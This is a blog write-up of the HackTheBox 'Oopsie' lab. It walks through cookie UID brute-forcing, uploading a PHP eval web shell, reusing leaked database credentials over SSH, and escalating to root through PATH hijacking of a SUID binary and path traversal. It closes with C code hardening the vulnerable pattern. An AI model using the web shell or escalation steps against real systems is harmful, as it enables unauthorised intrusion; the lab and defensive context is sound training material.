Virts's Blog ❤️
HackTheBox [Oopsie] WriteUp

GetShell

Visit port 80 and view the page source: it reveals the path http://10.129.230.107/cdn-cgi/login/, which is the backend management panel and allows a direct Guest login.

After logging in, two extra cookies appear, and the one named user should correspond to the UID. Brute force it with Burp. An HTB hint says it is a 5-digit number whose last digit is 2, so the search space is small: at most 9000 attempts.

The brute force shows that the admin's UID is 34322. With it, the upload interface becomes accessible, and a PHP one-liner can be uploaded directly.

<?php eval($_REQUEST['1']);

The file is uploaded to http://10.129.230.107/uploads/filename.php, and AntSword connects to it successfully, although the directory seems to be cleaned periodically.

Inspecting the source reveals the database configuration file /var/www/html/cdn-cgi/login/db.php, which contains the user robert and a password.

Using these credentials over SSH, login succeeds and a shell is obtained.

Privilege Escalation

The user has an executable named bugtracker that can be run directly. The principle should be that the SUID program invokes cat, so the cat command runs with root rights and can read any file. However, this cat is not called by its absolute path /bin/cat, so the PATH environment variable can be modified to control which cat is executed, achieving privilege escalation.

First, create a folder /tmp/test, then create a cat file in /tmp/test with the following content.

/bin/bash

Grant executable permissions to cat.

chmod +x cat

Modify the environment variable.

export PATH=/tmp/test:/bin:/usr/bin
which cat

At this point, the cat found first in PATH is a root-privilege shell, and running bugtracker escalates privileges successfully. However, cat can no longer be used to view the flag; use head or another command instead.

head /home/robert/user.txt
head /root/root.txt

This challenge can also be solved without that method: as long as the root flag's file name can be guessed, bugtracker behaves like an arbitrary file read. Run it directly and enter ../../../root/root.txt as the bug ID to read the flag.
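Both weaknesses the writeup exploits (a relative cat resolved through the caller's PATH, and a bug ID concatenated into a path unchecked) come from the same coding pattern. The following is an added illustration, not the real bugtracker source: the unsafe pattern beside a hardened version. The report directory /root/reports/ and the 8-digit ID limit are assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>

#define REPORT_DIR "/root/reports/"   /* assumed location of bug reports */

/* Unsafe pattern: "cat" is resolved through the caller's PATH (hijackable),
 * and the id is concatenated unchecked, so "../" escapes REPORT_DIR. */
int show_report_unsafe(const char *id) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "cat " REPORT_DIR "%s", id);
    return system(cmd);
}

/* Hardened step 1: the id must be a non-empty run of digits (max 8, assumed). */
int valid_bug_id(const char *id) {
    if (id == NULL || *id == '\0' || strlen(id) > 8) return 0;
    for (const char *p = id; *p; p++)
        if (!isdigit((unsigned char)*p)) return 0;
    return 1;
}

/* Hardened step 2: build the path only from a validated id; 0 means refused. */
int build_report_path(const char *id, char *out, size_t outlen) {
    if (!valid_bug_id(id)) return 0;
    int n = snprintf(out, outlen, REPORT_DIR "%s", id);
    return n > 0 && (size_t)n < outlen;
}

/* Hardened step 3: run /bin/cat by absolute path with a fixed, minimal
 * environment, so the caller's PATH (or any other variable) is irrelevant. */
int show_report_safe(const char *id) {
    char path[256];
    if (!build_report_path(id, path, sizeof path)) return -1;
    char *const argv[] = { "/bin/cat", path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    execve("/bin/cat", argv, envp);
    return -1;  /* only reached if execve itself failed */
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s <bug-id>\n", argv[0]); return 2; }
    return show_report_safe(argv[1]) < 0 ? 1 : 0;
}
```

With the hardened version, both ../../../root/root.txt as an ID and a planted cat in PATH are rejected or ignored; the remaining risk is limited to the report files themselves.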